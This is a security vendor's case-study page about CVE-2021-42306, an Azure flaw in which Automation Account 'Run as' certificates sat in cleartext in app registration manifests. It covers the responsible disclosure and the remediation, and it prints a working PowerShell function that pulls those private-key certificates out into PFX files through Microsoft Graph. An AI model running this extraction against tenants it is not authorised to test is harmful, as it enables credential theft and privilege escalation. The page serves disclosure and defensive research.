Proactive Security Story: Cloud Pentesting

CredManifest: App Registration Certificates Stored in Azure AD

Karl Fosaaen
VP of Research

Discovery & Impact

Karl identified a misconfiguration in Azure where Automation Account "Run as" credentials were stored in cleartext in Azure Entra ID (formerly Active Directory). This resulted in an impactful privilege escalation, as it would allow any user in this environment to escalate to "Contributor" of any subscription with an Automation Account.

Remediation Outcome

Karl responsibly disclosed the vulnerability to Microsoft who has since deployed updates that prevent cleartext private key data from being stored during application creation and prevents access to private key data previously stored.
NetSPI recommends cycling existing Automation Account “Run as” certificates, given the potential exposure of these credentials.

Read Full Blog: CVE-2021-42306 CredManifest: App Registration Certificates Stored in Azure Active Directory

We identified an issue in the way the Automation Account "Run as" credentials were created when creating a new Automation Account in Azure.

Then, we manually extract credentials by copying the certificate data out of the manifest and converting it to a PFX file. We did this with two lines of PowerShell.

Next, we imported the certificate to our local store using PowerShell in a local administrator session.

Using the newly installed certificate, we authenticated to the Azure subscription as the App Registration.

We were able to run the Add-AzAccount command to authenticate to the tenant with the Directory (Tenant) ID, App (Client) ID, and Certificate Thumbprint values available.

Finally, we developed PowerShell script to automate extraction.

From MicroBurst GitHub

# Check if the Az Module is installed and imported
if(!(Get-Module Az)){
    try{Import-Module Az -ErrorAction Stop}
    catch{Install-Module -Name Az -Confirm}
    }


Function Get-AzAppRegistrationManifest
{

    [CmdletBinding()]
    Param()

    $resource = "https://graph.microsoft.com"
    $AccessToken = Get-AzAccessToken -ResourceUrl $resource
    if ($AccessToken.Token -is [System.Security.SecureString]) {
        $ssPtr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($AccessToken.Token)
        try {
            $Token = [System.Runtime.InteropServices.Marshal]::PtrToStringBSTR($ssPtr)
        } finally {
            [System.Runtime.InteropServices.Marshal]::ZeroFreeBSTR($ssPtr)
        }
    } else {
        $Token = $AccessToken.Token
    }
    $url = "https://graph.microsoft.com/v1.0/myorganization/applications/?`$select=displayName,id,appId,createdDateTime,keyCredentials"

    $authHeader = @{
      "Authorization" = "Bearer " + $Token
    }

    while ($null -ne $url) {
        $results = Invoke-RestMethod -Uri $url -Headers $authHeader -Method "GET" -Verbose:$false
        foreach ($appReg in $results.value) {

            if($appReg.displayName){$displayName = $appReg.displayName}
            else{$displayName = $appReg.Id}
                
            $appID = $appReg.Id

            #Write-Verbose "Trying - $displayName"
            foreach ($cred in $appReg.keyCredentials) {
                if ($cred.Key.Length -gt 2000) {

                    $outputBase = "$PWD$appID"
                    $outputFile = "$PWD$appID.pfx"
                    $iter = 1

                    while(Test-Path $outputFile){                    
                        $outputFile = (-join($outputBase,'-',([string]$iter),'.pfx'))
                        $iter +=1
                        Write-Verbose "`tMultiple Creds - Trying $outputFile"
                    }
        
                    [IO.File]::WriteAllBytes($outputFile, [Convert]::FromBase64String($cred.Key))
                    $certResults = Get-PfxData $outputFile
        
                    $ErrorActionPreference = 'SilentlyContinue'
                    if($certResults -ne $null){
                        Write-Verbose "`t$displayName - $appID - has a stored pfx credential"    
                         "$displayName `t $appID" | Out-File -Append "$PWDAffectedAppRegistrations.txt"
                    }
                    else{Remove-Item $outputFile| Out-Null}
                }
            }
        }
      $url = $results.'@odata.nextLink'
    }
}

Extracting Managed Identity Certificates from the Azure Arc Service

Read story

We Know What You Did (in Azure) Last Summer

Read story

CVE-2021-42306 CredManifest: App Registration Certificates Stored in Azure Active Directory

Read story

Chubb partners with NetSPI to bring attack surface management to its policyholders

Partner with NetSPI

CredManifest: App Registration Certificates Stored in Azure AD

Karl Fosaaen
VP of Research

Discovery & Impact

Remediation Outcome

Extracting Managed Identity Certificates from the Azure Arc Service

We Know What You Did (in Azure) Last Summer

CVE-2021-42306 CredManifest: App Registration Certificates Stored in Azure Active Directory

Chubb partners with NetSPI to bring attack surface management to its policyholders

Partner with NetSPI

Karl Fosaaen VP of Research

Discovery & Impact

Remediation Outcome

Extracting Managed Identity Certificates from the Azure Arc Service

We Know What You Did (in Azure) Last Summer

CVE-2021-42306 CredManifest: App Registration Certificates Stored in Azure Active Directory

Karl Fosaaen
VP of Research